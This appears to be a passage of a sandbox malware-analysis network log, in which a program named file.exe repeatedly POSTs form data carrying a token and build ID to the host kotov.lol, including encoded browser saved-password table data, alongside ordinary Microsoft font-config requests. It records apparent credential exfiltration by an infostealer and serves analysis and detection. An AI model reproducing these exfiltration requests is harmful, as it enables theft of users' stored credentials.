2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AAKKFHCFIECAAAKEGCFICont
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49730	2.18.84.141	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:46 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-29 11:27:46 UTC	479	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=141125 Date: Fri, 29 Nov 2024 11:27:46 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49732	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:47 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:47 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BAKEBAFIIECBGCAAAAFCCont
2024-11-29 11:27:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:47 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:47 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49733	2.18.84.141	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:48 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-29 11:27:48 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=200871 Date: Fri, 29 Nov 2024 11:27:48 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-29 11:27:48 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49734	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:49 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------JDAFIEHIEGDHIDGDGHDHContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------JDAFIEHIEGDHIDGDGHDHContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------JDAFIEHIEGDHIDGDGHDHCont
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
